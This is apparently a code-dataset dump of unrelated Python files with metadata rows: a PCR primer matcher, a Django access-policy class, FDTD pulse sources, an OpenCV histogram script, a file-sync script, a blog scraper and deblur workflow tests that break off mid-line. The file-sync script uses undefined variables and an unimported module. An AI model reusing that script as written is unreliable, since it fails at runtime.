GTGCCACCAGCCGCGGTAA GTGCCAGAAGTCTCGGTAA GTGCCAGAAGCGTCGGTAA GTGCCAGAAGCCTCGGTAA """ with open(path, 'r') as handle: lines = [line.strip() for line in handle if line.strip()] header = lines[0].lstrip('#').strip() primers = map(Primer, lines[1:]) name, position = header.split() start, end = map(int, position.split('-')) return PrimerPool(name, start, end, primers) @property def fw_primer_pool(self): return PCRArray.parse_primer_pool(self._fw_path) @property def rv_primer_pool(self): return PCRArray.parse_primer_pool(self._rv_path) def iter(self): for seqrecord in SeqIO.parse(self._fasta_path, 'fasta'): template = Template(seqrecord) pcr = PCR(template, self.fw_primer_pool, self.rv_primer_pool, simple_match) yield pcr.run() def to_df(self): data = [pcrmatch.__dict__ for pcrmatch in self.iter()] return pd.DataFrame(data) def to_sql(self, filename, out_dir): df = self.to_df() with sqlite3.connect(os.path.join(out_dir, filename)) as conn: df.to_sql('testprimer', conn, if_exists='replace', index=False) return def simple_match(seq1, seq2): return seq1.upper() == seq2.upper() def pcr(fasta_path, fw_path, rv_path, filename, out_dir): '''Main module entrance''' pcrarray = PCRArray(fasta_path, fw_path, rv_path) pcrarray.to_sql(filename, out_dir) return
null
testprimer/pcr.py
pcr.py
py
6,860
python
en
code
null
code-starcoder2
83
[ { "api_name": "Bio.SeqRecord.SeqRecord", "line_number": 31, "usage_type": "argument" }, { "api_name": "Bio.Seq.Seq", "line_number": 40, "usage_type": "name" }, { "api_name": "Bio.SeqIO.parse", "line_number": 206, "usage_type": "call" }, { "api_name": "Bio.SeqIO", "line_number": 206, "usage_type": "name" }, { "api_name": "pandas.DataFrame", "line_number": 214, "usage_type": "call" }, { "api_name": "sqlite3.connect", "line_number": 218, "usage_type": "call" }, { "api_name": "os.path.path.join", "line_number": 218, "usage_type": "call" }, { "api_name": "os.path.path", "line_number": 218, "usage_type": "attribute" }, { "api_name": "os.path", "line_number": 218, "usage_type": "name" } ]
166017370
import importlib from typing import List from django.conf import settings from django.db.models import prefetch_related_objects from rest_access_policy import AccessPolicyException from rest_framework import permissions class AccessPolicy(permissions.BasePermission): statements = [] id = None group_prefix = "group:" id_prefix = "id:" def has_permission(self, request, view) -> bool: action = self._get_invoked_action(view) statements = self.get_policy_statements(request, view) if len(statements) == 0: return False return self._evaluate_statements(statements, request, view, action) def get_policy_statements(self, request, view) -> List[dict]: return self.statements def get_user_group_values(self, user) -> List[str]: if user.is_anonymous: return [] prefetch_related_objects([user], "groups") return [g.name for g in user.groups.all()] @classmethod def scope_queryset(cls, request, qs): return qs.none() def _get_invoked_action(self, view) -> str: """ If a CBV, the name of the method. If a regular function view, the name of the function. """ if hasattr(view, "action"): return view.action elif hasattr(view, "__class__"): return view.__class__.__name__ raise AccessPolicyException("Could not determine action of request") def _evaluate_statements( self, statements: List[dict], request, view, action: str ) -> bool: statements = self._normalize_statements(statements) matched = self._get_statements_matching_principal(request, statements) matched = self._get_statements_matching_action(request, action, matched) matched = self._get_statements_matching_context_conditions( request, view, action, matched ) denied = [_ for _ in matched if _["effect"] != "allow"] if len(matched) == 0 or len(denied) > 0: return False return True def _normalize_statements(self, statements=[]) -> List[dict]: for statement in statements: if isinstance(statement["principal"], str): statement["principal"] = [statement["principal"]] if isinstance(statement["action"], str): statement["action"] = [statement["action"]] if "condition" not in statement: statement["condition"] = [] elif isinstance(statement["condition"], str): statement["condition"] = [statement["condition"]] return statements def _get_statements_matching_principal( self, request, statements: List[dict] ) -> List[dict]: user = request.user user_roles = None matched = [] for statement in statements: principals = statement["principal"] found = False if "*" in principals: found = True elif "authenticated" in principals: found = not user.is_anonymous elif "anonymous" in principals: found = user.is_anonymous elif self.id_prefix + str(user.pk) in principals: found = True else: if not user_roles: user_roles = self.get_user_group_values(user) for user_role in user_roles: if self.group_prefix + user_role in principals: found = True break if found: matched.append(statement) return matched def _get_statements_matching_action( self, request, action: str, statements: List[dict] ): """ Filter statements and return only those that match the specified action. """ matched = [] SAFE_METHODS = ("GET", "HEAD", "OPTIONS") http_method = "<method:%s>" % request.method.lower() for statement in statements: if action in statement["action"] or "*" in statement["action"]: matched.append(statement) elif http_method in statement["action"]: matched.append(statement) elif ( "<safe_methods>" in statement["action"] and request.method in SAFE_METHODS ): matched.append(statement) return matched def _get_statements_matching_context_conditions( self, request, view, action: str, statements: List[dict] ): """ Filter statements and only return those that match all of their custom context conditions; if no conditions are provided then the statement should be returned. """ matched = [] for statement in statements: if len(statement["condition"]) == 0: matched.append(statement) continue fails = 0 for condition in statement["condition"]: passed = self._check_condition(condition, request, view, action) if not passed: fails += 1 break if fails == 0: matched.append(statement) return matched def _check_condition(self, condition: str, request, view, action: str): """ Evaluate a custom context condition; if method does not exist on the access policy class, then return False. Condition value can contain a value that is passed to method, if formatted as `<method_name>:<arg_value>`. """ parts = condition.split(":", 1) method_name = parts[0] arg = parts[1] if len(parts) == 2 else None method = self._get_condition_method(method_name) if arg is not None: result = method(request, view, action, arg) else: result = method(request, view, action) if type(result) is not bool: raise AccessPolicyException( "condition '%s' must return true/false, not %s" % (condition, type(result)) ) return result def _get_condition_method(self, method_name: str): if hasattr(self, method_name): return getattr(self, method_name) if hasattr(settings, "DRF_ACCESS_POLICY"): module_path = settings.DRF_ACCESS_POLICY.get("reusable_conditions") if module_path: module = importlib.import_module(module_path) if hasattr(module, method_name): return getattr(module, method_name) raise AccessPolicyException( "condition '%s' must be a method on the access policy or be defined in the 'reusable_conditions' module" % method_name )
null
rest_access_policy/access_policy.py
access_policy.py
py
6,942
python
en
code
null
code-starcoder2
83
[ { "api_name": "rest_framework.permissions.BasePermission", "line_number": 10, "usage_type": "attribute" }, { "api_name": "rest_framework.permissions", "line_number": 10, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 25, "usage_type": "name" }, { "api_name": "django.db.models.prefetch_related_objects", "line_number": 31, "usage_type": "call" }, { "api_name": "typing.List", "line_number": 28, "usage_type": "name" }, { "api_name": "rest_access_policy.AccessPolicyException", "line_number": 47, "usage_type": "call" }, { "api_name": "typing.List", "line_number": 50, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 67, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 83, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 84, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 116, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 140, "usage_type": "name" }, { "api_name": "rest_access_policy.AccessPolicyException", "line_number": 186, "usage_type": "call" }, { "api_name": "django.conf.settings", "line_number": 197, "usage_type": "argument" }, { "api_name": "django.conf.settings.DRF_ACCESS_POLICY.get", "line_number": 198, "usage_type": "call" }, { "api_name": "django.conf.settings.DRF_ACCESS_POLICY", "line_number": 198, "usage_type": "attribute" }, { "api_name": "django.conf.settings", "line_number": 198, "usage_type": "name" }, { "api_name": "importlib.import_module", "line_number": 201, "usage_type": "call" }, { "api_name": "rest_access_policy.AccessPolicyException", "line_number": 206, "usage_type": "call" } ]
316333306
import numpy as np import matplotlib.pyplot as plt from scipy.constants import c, mu_0, epsilon_0 class Gaussian(object): def __init__(self, dt, center_wv, spread, pick_pos, dtype): self.dt = dt self.dtype = dtype self.wvlenc = center_wv self.spread = spread self.pick_pos = pick_pos self.freqc = c / self.wvlenc self.w0 = 2 * np.pi * self.freqc self.ws = self.spread * self.w0 self.ts = 1./self.ws self.tc = self.pick_pos * self.dt def pulse_re(self,step,pick_pos): pulse_re = np.exp((-.5) * (((step*self.dt-self.tc)*self.ws)**2)) * np.cos(self.w0*(step*self.dt-self.tc)) return pulse_re def pulse_im(self,step,pick_pos): pulse_im = np.exp((-.5) * (((step*self.dt-self.tc)*self.ws)**2)) * np.sin(self.w0*(step*self.dt-self.tc)) return pulse_im def plot_pulse(self, tsteps, freqs, savedir): nax = np.newaxis time_domain = np.arange(tsteps, dtype=self.dtype) t = time_domain * self.dt self.freqs = freqs self.wvlens = c / self.freqs[::-1] pulse_re = np.exp((-.5) * (((t-self.tc)*self.ws)**2)) * np.cos(self.w0*(t-self.tc)) pulse_im = np.exp((-.5) * (((t-self.tc)*self.ws)**2)) * np.sin(self.w0*(t-self.tc)) pulse_re_ft = (self.dt * pulse_re[nax,:]* np.exp(1j*2*np.pi*self.freqs[:,nax]*t[nax,:])).sum(1) / np.sqrt(2*np.pi) pulse_im_ft = (self.dt * pulse_im[nax,:]* np.exp(1j*2*np.pi*self.freqs[:,nax]*t[nax,:])).sum(1) / np.sqrt(2*np.pi) pulse_re_ft_amp = abs(pulse_re_ft)**2 pulse_im_ft_amp = abs(pulse_im_ft)**2 fig = plt.figure(figsize=(21,7)) ax1 = fig.add_subplot(1,3,1) ax2 = fig.add_subplot(1,3,2) ax3 = fig.add_subplot(1,3,3) ax1.plot(time_domain, pulse_re, color='b', label='real') ax1.plot(time_domain, pulse_im, color='r', label='imag', linewidth='1.5', alpha=0.5) ax2.plot(self.freqs/10**12, pulse_re_ft_amp, color='b', label='real') ax2.plot(self.freqs/10**12, pulse_im_ft_amp, color='r', label='imag', linewidth='1.5', alpha=0.5) ax3.plot(self.wvlens/1e-6, pulse_re_ft_amp, color='b', label='real') ax3.plot(self.wvlens/1e-6, pulse_im_ft_amp, color='r', label='imag', linewidth='1.5', alpha=0.5) ax1.set_xlabel('time step') ax1.set_ylabel('Amp') ax1.legend(loc='best') ax1.grid(True) #ax1.set_xlim(4000,6000) ax2.set_xlabel('freq(THz)') ax2.set_ylabel('Amp') ax2.legend(loc='best') ax2.grid(True) ax2.set_ylim(0,None) ax3.set_xlabel('wavelength(um)') ax3.set_ylabel('Amp') ax3.legend(loc='best') ax3.grid(True) ax3.set_ylim(0,None) fig.savefig(savedir+"/graph/src_input.png") class Sine(object): def __init__(self, dt, dtype): self.dt = dt self.dtype = dtype def set_freq(self, freq): self.freq = freq self.wvlen = c / self.freq self.omega = 2 * np.pi * self.freq self.wvector = 2 * np.pi / self.wvlen def set_wvlen(self, wvlen): self.wvlen = wvlen self.freq = c / self.wvlen self.omega = 2 * np.pi * self.freq self.wvector = 2 * np.pi / self.wvlen def signal(self, tstep): pulse_re = np.sin(self.omega * tstep * self.dt) return pulse_re class Cosine(object): def __init__(self, dt, dtype): self.dt = dt self.dtype = dtype def set_freq(self, freq): self.freq = freq self.wvlen = c / self.freq self.omega = 2 * np.pi * self.freq self.wvector = 2 * np.pi / self.wvlen def set_wvlen(self, wvlen): self.wvlen = wvlen self.freq = c / self.wvlen self.omega = 2 * np.pi * self.freq self.wvector = 2 * np.pi / self.wvlen def signal(self, tstep): pulse_re = np.cos(self.omega * tstep * self.dt) return pulse_re
null
pyctypes/FDTD.real.diel.CPML.MPI/source.py
source.py
py
4,067
python
en
code
null
code-starcoder2
83
[ { "api_name": "scipy.constants.c", "line_number": 14, "usage_type": "name" }, { "api_name": "numpy.pi", "line_number": 16, "usage_type": "attribute" }, { "api_name": "numpy.exp", "line_number": 23, "usage_type": "call" }, { "api_name": "numpy.cos", "line_number": 23, "usage_type": "call" }, { "api_name": "numpy.exp", "line_number": 29, "usage_type": "call" }, { "api_name": "numpy.sin", "line_number": 29, "usage_type": "call" }, { "api_name": "numpy.newaxis", "line_number": 35, "usage_type": "attribute" }, { "api_name": "numpy.arange", "line_number": 37, "usage_type": "call" }, { "api_name": "scipy.constants.c", "line_number": 41, "usage_type": "name" }, { "api_name": "numpy.exp", "line_number": 43, "usage_type": "call" }, { "api_name": "numpy.cos", "line_number": 43, "usage_type": "call" }, { "api_name": "numpy.exp", "line_number": 44, "usage_type": "call" }, { "api_name": "numpy.sin", "line_number": 44, "usage_type": "call" }, { "api_name": "numpy.exp", "line_number": 46, "usage_type": "call" }, { "api_name": "numpy.pi", "line_number": 46, "usage_type": "attribute" }, { "api_name": "numpy.sqrt", "line_number": 46, "usage_type": "call" }, { "api_name": "numpy.exp", "line_number": 47, "usage_type": "call" }, { "api_name": "numpy.pi", "line_number": 47, "usage_type": "attribute" }, { "api_name": "numpy.sqrt", "line_number": 47, "usage_type": "call" }, { "api_name": "matplotlib.pyplot.figure", "line_number": 52, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name" }, { "api_name": "scipy.constants.c", "line_number": 97, "usage_type": "name" }, { "api_name": "numpy.pi", "line_number": 98, "usage_type": "attribute" }, { "api_name": "numpy.pi", "line_number": 99, "usage_type": "attribute" }, { "api_name": "scipy.constants.c", "line_number": 104, "usage_type": "name" }, { "api_name": "numpy.pi", "line_number": 105, "usage_type": "attribute" }, { "api_name": "numpy.pi", "line_number": 106, "usage_type": "attribute" }, { "api_name": "numpy.sin", "line_number": 110, "usage_type": "call" }, { "api_name": "scipy.constants.c", "line_number": 125, "usage_type": "name" }, { "api_name": "numpy.pi", "line_number": 126, "usage_type": "attribute" }, { "api_name": "numpy.pi", "line_number": 127, "usage_type": "attribute" }, { "api_name": "scipy.constants.c", "line_number": 132, "usage_type": "name" }, { "api_name": "numpy.pi", "line_number": 133, "usage_type": "attribute" }, { "api_name": "numpy.pi", "line_number": 134, "usage_type": "attribute" }, { "api_name": "numpy.cos", "line_number": 138, "usage_type": "call" } ]
414349889
''' 绘制灰度图的统计直方图 ----------------------- 首先我们将图片读入为img, 然后转换为灰度图gray. 然后将gray 用numpy的ravel函数变为一维的扁平数组, 输入到plt.hist 中. 了解更多查看numpy.ravel -文档 最终我们得到灰度图的统计图. ''' from matplotlib import pyplot as plt import numpy as np import cv2 # img = cv2.imread('little_chess.png') img = cv2.imread('dao_roi.png') if img is None: print("图片读入失败") exit() gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) ''' 1Darray: 一维数组 这里通过gray.ravel(),把灰度图变为一维数组. bins: 统计分隔区间 如果是256 就是分成256份统计, 你可以修改这个值, 看不同的统计效果 range: 统计数值的空间 ''' plt.hist(gray.ravel(), bins=256, range=[0, 256]) plt.show()
null
TeachCode代码教学区/CH4_ROI颜色统计与图像二值化/CH4.2_DrawImgGrayscaleStat.py
CH4.2_DrawImgGrayscaleStat.py
py
871
python
en
code
null
code-starcoder2
83
[ { "api_name": "cv2.imread", "line_number": 16, "usage_type": "call" }, { "api_name": "cv2.cvtColor", "line_number": 21, "usage_type": "call" }, { "api_name": "cv2.COLOR_BGR2GRAY", "line_number": 21, "usage_type": "attribute" }, { "api_name": "matplotlib.pyplot.hist", "line_number": 29, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name" }, { "api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name" } ]
633139889
""" filesync.py Copy files from an repo directory to an full environment. This script ties in nicely to vim's plugin neomake which will call this script every time a file saves. This script will copy an entire OpenNet copy over to an environment, or just a single file. """ import shutil from distutils import dir_util import re import os import argparse def copytree(src, dst, symlinks=False, ignore=None): """ Copy the whole OpenNet folder Keyword arguments: src -- the directory we want to copy from dst -- the directory we want to copy to syslinks -- if true, preserve symlinks. if false, copy symlink contents ignore -- ignore specified directories returns: none """ for item in os.listdir(src): s = os.path.join(src, item) d = os.path.join(dst, item) if os.path.isdir(s): shutil.copytree(s, d, symlinks, ignore) else: shutil.copy2(s, d) def can_copy_to_dest(): """ Determine if we are able to copy to the specified destination. If a different OpenNet copy has been copied over to the dest, prompt the user on whether or not it is ok to copy. returns: bool """ # get src directory r = re.search(".*?(Prod1|Prod2|Prod3)/(.*?)/", dest_file) print(dest_file) if r: directory = r.group(2) print(r.group(2)) # check src_file src_file_path = targetdir + 'src.fs' if os.path.isfile(src_file_path): src_file = open(src_file_path, 'r') src = src_file.read().splitlines() if src: src = src[0] if not src == directory: print("The last file sync to this destination used a different source. Would you like to continue? y/n") answer = "" while answer is not "y": answer = input() if answer is "n": return False if answer is "y": src_file.close() #delete src file os.remove(targetdir + 'src.fs') src_file = open(src_file_path, "w") src_file.write(directory) src_file.close() return True print("valid answers are \"y\" and \"n\"") else: #TODO: do a product, path in the src_file so we can write from multiple # projects without having to switch src_file = open(src_file_path, 'w') src_file.write(directory) src_file.close() return True def main(): parser = argparse.ArgumentParser(description='filesync', prog="filesync.py") parser.add_argument('-v', '--version', action='version', version='%(prog)s 0.0.1.0') parser.add_argument('-f', help='Sync single file, by default all files are copied') parser.add_argument('--dest_file', help='Absolute path to the destination file. This is required') args = parser.parse_args() if args.f: r = re.search("(.*Prod1/.*?/)", args.f) if r: dest_file = r.group(1) + "/dest.fs" else: r = re.search("(.*Open[a-zA-Z]+/.*?/)", args.f) if r: dest_file = r.group(1) + "dest.fs" else: dest_file = args.dest_file try: config_file = open(dest_file, 'r') config_file = config_file.read().splitlines() config = config_file[0] except FileNotFoundError: print("dest.fs does not exist. Please configure before using") exit() if config == "auto": #use auto matching to determine which directory to copy to targetdir = smart_dest.smart_dest(dest_file) else: targetdir = '/home/jared/D/osi/' + config + '/' # check if targetdir exists. If not complain and exit if not os.path.isdir(targetdir): print(targetdir) print("Environment provided in dest.fs does not exist. Check configuration and try again") exit() # check is src.fs exists in dest, if so make sure we are allowed to copy from this directory if not args.f: can_copy_to_dest() if args.f: #file path r = re.search(".*Prod1/.*?/(.*)", args.f) if r: file_path = r.group(1) target = targetdir + file_path else: r = re.search(".*Open[a-zA-Z]+/.*?/(.*)", args.f) if r: file_path = r.group(1) target = targetdir + file_path print("src: " + args.f) print("target: " + target) shutil.copy(args.f, target) print("copy complete!") else: #src path r = re.search("(.*Prod1/.*?/)", dest_file) if r: src_path = r.group(1) else: r = re.search("(.*Open[a-zA-Z]+/.*?/)", dest_file) if r: src_path = r.group(1) print("src: " + src_path) print("target: " + targetdir) dir_util.copy_tree(src_path, targetdir) print("copy complete!") if __name__ == '__main__': main()
null
environment_sync/src/filesync/filesync.py
filesync.py
py
5,098
python
en
code
null
code-starcoder2
83
[ { "api_name": "os.listdir", "line_number": 30, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 31, "usage_type": "call" }, { "api_name": "os.path", "line_number": 31, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 32, "usage_type": "call" }, { "api_name": "os.path", "line_number": 32, "usage_type": "attribute" }, { "api_name": "os.path.isdir", "line_number": 33, "usage_type": "call" }, { "api_name": "os.path", "line_number": 33, "usage_type": "attribute" }, { "api_name": "shutil.copytree", "line_number": 34, "usage_type": "call" }, { "api_name": "shutil.copy2", "line_number": 36, "usage_type": "call" }, { "api_name": "re.search", "line_number": 49, "usage_type": "call" }, { "api_name": "os.path.isfile", "line_number": 57, "usage_type": "call" }, { "api_name": "os.path", "line_number": 57, "usage_type": "attribute" }, { "api_name": "os.remove", "line_number": 74, "usage_type": "call" }, { "api_name": "argparse.ArgumentParser", "line_number": 92, "usage_type": "call" }, { "api_name": "re.search", "line_number": 99, "usage_type": "call" }, { "api_name": "re.search", "line_number": 103, "usage_type": "call" }, { "api_name": "os.path.isdir", "line_number": 125, "usage_type": "call" }, { "api_name": "os.path", "line_number": 125, "usage_type": "attribute" }, { "api_name": "re.search", "line_number": 137, "usage_type": "call" }, { "api_name": "re.search", "line_number": 142, "usage_type": "call" }, { "api_name": "shutil.copy", "line_number": 149, "usage_type": "call" }, { "api_name": "re.search", "line_number": 153, "usage_type": "call" }, { "api_name": "re.search", "line_number": 157, "usage_type": "call" }, { "api_name": "distutils.dir_util.copy_tree", "line_number": 163, "usage_type": "call" }, { "api_name": "distutils.dir_util", "line_number": 163, "usage_type": "name" } ]
154353794
from urllib.request import urlopen from bs4 import BeautifulSoup import datetime import random name = "Python blog tracker" version = "0.1" depends = ['beatifulsoup4'] waiter = True def get_news(): url = "https://www.python.org/blogs/" data = urlopen(url).read().decode('utf8') bs = BeautifulSoup(data, features="html.parser") date = bs.find( 'ul', class_='list-recent-posts').li.p.time.attrs['datetime'] title = bs.find( 'ul', class_='list-recent-posts').li.h3.text.replace('!', '')\ .replace('.', '') if datetime.datetime.strptime(date, '%Y-%m-%d').day == \ datetime.date.today().day \ and \ datetime.datetime.strptime(date, '%Y-%m-%d').month == \ datetime.date.today().month: return {'title': 'New post in Python blog!', 'text': f'It\'s titled "{title}". ' f'Check it out on python.org/blogs/ now!'} return None
null
newsportal/reporters/reporter_4.py
reporter_4.py
py
981
python
en
code
null
code-starcoder2
83
[ { "api_name": "urllib.request.urlopen", "line_number": 14, "usage_type": "call" }, { "api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call" }, { "api_name": "datetime.datetime.strptime", "line_number": 23, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 23, "usage_type": "attribute" }, { "api_name": "datetime.date.today", "line_number": 24, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 24, "usage_type": "attribute" }, { "api_name": "datetime.datetime.strptime", "line_number": 26, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 26, "usage_type": "attribute" }, { "api_name": "datetime.date.today", "line_number": 27, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 27, "usage_type": "attribute" } ]
143256848
# ----------------------------------------------------------------------------- # Copyright (c) 2015, The Deblur Development Team. # # Distributed under the terms of the BSD 3-clause License. # # The full license is in the file LICENSE, distributed with this software. # ----------------------------------------------------------------------------- from unittest import TestCase, main from shutil import rmtree from tempfile import mkdtemp from os import listdir from types import GeneratorType from os.path import join, isfile, abspath, dirname, splitext from skbio.util import remove_files from skbio.parse.sequences import parse_fasta from skbio.alignment import SequenceCollection from skbio import DNA from biom import load_table import logging from deblur.workflow import (dereplicate_seqs, remove_chimeras_denovo_from_seqs, remove_artifacts_seqs, create_otu_table, get_files_for_table, trim_seqs, multiple_sequence_alignment, launch_workflow, split_sequence_file_on_sample_ids_to_files, build_index_sortmerna, start_log) class workflowTests(TestCase): """ Test deblur pipeline and individual methods functionality """ def setUp(self): """ Create working directory and two FASTA input files corresponding to two samples (s1 and s2). Each input file contains 120 sequences, of which 100 are 16S amplicons (ART simulator), 10 are chimeric sequences (Grinder) and 10 are PhiX artifacts (ART). The 100 amplicon sequences intend to evenly represent a community of 10 species. """ # test output can be written to this directory self.working_dir = mkdtemp() # the data directory for the workflow test files self.test_data_dir = join(dirname(abspath(__file__)), 'data') self.seqs_s1_fp = join(self.test_data_dir, 'seqs_s1.fasta') self.seqs_s2_fp = join(self.test_data_dir, 'seqs_s2.fasta') self.seqs_s3_fp = join(self.test_data_dir, 'seqs_s3.fasta') self.orig_s1_fp = join(self.test_data_dir, 'simset.s1.fasta') self.orig_s2_fp = join(self.test_data_dir, 'simset.s2.fasta') self.orig_s3_fp = join(self.test_data_dir, 'simset.s3.fasta') self.files_to_remove = [] logfilename = join(self.working_dir, "log.txt") start_log(level=logging.DEBUG, filename=logfilename) def tearDown(self): remove_files(self.files_to_remove) rmtree(self.working_dir) def test_trim_seqs(self): seqs = [("seq1", "tagggcaagactccatggtatga"), ("seq2", "cggaggcgagatgcgtggta"), ("seq3", "tactagcaagattcctggtaaagga"), ("seq4", "aggatgcgagatgcgtg"), ("seq5", "gagtgcgagatgcgtggtgagg"), ("seq6", "ggatgcgagatgcgtggtgatt"), ("seq7", "agggcgagattcctagtgga--")] obs = trim_seqs(seqs, 20) self.assertTrue(isinstance(obs, GeneratorType)) exp = [("seq1", "tagggcaagactccatggta"), ("seq2", "cggaggcgagatgcgtggta"), ("seq3", "tactagcaagattcctggta"), ("seq5", "gagtgcgagatgcgtggtga"), ("seq6", "ggatgcgagatgcgtggtga"), ("seq7", "agggcgagattcctagtgga")] self.assertEqual(list(obs), exp) def test_dereplicate_seqs_remove_singletons(self): """ Test dereplicate_seqs() method functionality with removing singletons """ seqs = [("seq1", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG"), ("seq2", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG"), ("seq3", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG"), ("seq4", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCT"), ("seq5", "TACCAGCCCCTTAAGTGGTAGGGACGATTATTTGGCCTAAAGCGTCCG"), ("seq6", "CTGCAAGGCTAGGGGGCGGGAGAGGCGGGTGGTACTTGAGGGGAGAAT"), ("seq7", "CTGCAAGGCTAGGGGGCGGGAGAGGCGGGTGGTACTTGAGGGGAGAAT")] seqs_fp = join(self.working_dir, "seqs.fasta") with open(seqs_fp, 'w') as seqs_f: for seq in seqs: seqs_f.write(">%s\n%s\n" % seq) output_fp = join(self.working_dir, "seqs_derep.fasta") dereplicate_seqs(seqs_fp=seqs_fp, output_fp=output_fp) self.assertTrue(isfile(output_fp)) exp = [("seq1;size=3;", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG"), ("seq6;size=2;", "CTGCAAGGCTAGGGGGCGGGAGAGGCGGGTGGTACTTGAGGGGAGAAT")] with open(output_fp, 'U') as out_f: act = [item for item in parse_fasta(out_f)] self.assertEqual(act, exp) def test_dereplicate_seqs(self): """ Test dereplicate_seqs() method functionality, keep singletons """ seqs = [("seq1", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG"), ("seq2", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG"), ("seq3", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG"), ("seq4", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCT"), ("seq5", "TACCAGCCCCTTAAGTGGTAGGGACGATTATTTGGCCTAAAGCGTCCG"), ("seq6", "CTGCAAGGCTAGGGGGCGGGAGAGGCGGGTGGTACTTGAGGGGAGAAT"), ("seq7", "CTGCAAGGCTAGGGGGCGGGAGAGGCGGGTGGTACTTGAGGGGAGAAT")] seqs_fp = join(self.working_dir, "seqs.fasta") with open(seqs_fp, 'w') as seqs_f: for seq in seqs: seqs_f.write(">%s\n%s\n" % seq) output_fp = join(self.working_dir, "seqs_derep.fasta") dereplicate_seqs(seqs_fp=seqs_fp, output_fp=output_fp, min_size=1) self.assertTrue(isfile(output_fp)) exp = [("seq1;size=3;", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG"), ("seq6;size=2;", "CTGCAAGGCTAGGGGGCGGGAGAGGCGGGTGGTACTTGAGGGGAGAAT"), ("seq4;size=1;", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCT"), ("seq5;size=1;", "TACCAGCCCCTTAAGTGGTAGGGACGATTATTTGGCCTAAAGCGTCCG")] with open(output_fp, 'U') as out_f: act = [item for item in parse_fasta(out_f)] self.assertEqual(act, exp) def test_remove_artifacts_seqs(self): """ Test remove_artifacts_seqs() function for removing sequences not matching to a reference database using SortMeRNA. This test forces a new index construction for the reference sequences. """ seqs = [("seq1", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCC"), ("seq2", "CCTAAAACGTCCGTAGTCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("seq3", "TCGCTATTATTGAGCCTAAAACGTCCGTAGTCGGCTTTGTAAATCCC"), ("seq4", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCC"), ("seq5", "CTAAAACGTCCGTAGTCGGCTTTGTAAATCCCTGGGTAAATAGGGTC"), ("seq6", "TTGAGCCTAAAACGTCCGTAGTCGGCTTTGTAAATCCCTGGGTAAAT"), ("phix1", "TCTAAAGGTAAAAAACGTTCTGGCGCTCGCCCTGGTCGTCCGCAGCC"), ("phix2", "CTGGCGCTCGCCCTGGTCGTCCGCAGCCGTTGCGAGGTACTAAAGGC"), ("phix3", "GCGCATAAATTTGAGCAGATTTGTCGTCACAGGTTGCGCCGCCAAAA")] exp_seqs = ["seq1", "seq2", "seq3", "seq4", "seq5", "seq6"] seqs_fp = join(self.working_dir, "seqs.fasta") with open(seqs_fp, 'w') as seqs_f: for seq in seqs: seqs_f.write(">%s\n%s\n" % seq) ref = [("ref1", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTA" "GTCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref2", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref3", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref4", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref5", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATAGGGT"), ("ref6", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT")] ref_fp = join(self.working_dir, "ref2.fasta") with open(ref_fp, 'w') as ref_f: for seq in ref: ref_f.write(">%s\n%s\n" % seq) self.files_to_remove.append(ref_fp) ref_db_fp = build_index_sortmerna( ref_fp=(ref_fp,), working_dir=self.working_dir) output_fp = remove_artifacts_seqs(seqs_fp=seqs_fp, ref_fp=(ref_fp,), working_dir=self.working_dir, ref_db_fp=ref_db_fp, negate=False, threads=1) obs_seqs = [] with open(output_fp, 'U') as output_f: for label, seq in parse_fasta(output_f): obs_seqs.append(label) self.assertEqual(obs_seqs, exp_seqs) def test_remove_artifacts_seqs_index_prebuilt(self): """ Test remove_artifacts_seqs() function for removing sequences not matching to a reference database using SortMeRNA. This test passes a built index. """ seqs = [("seq1", 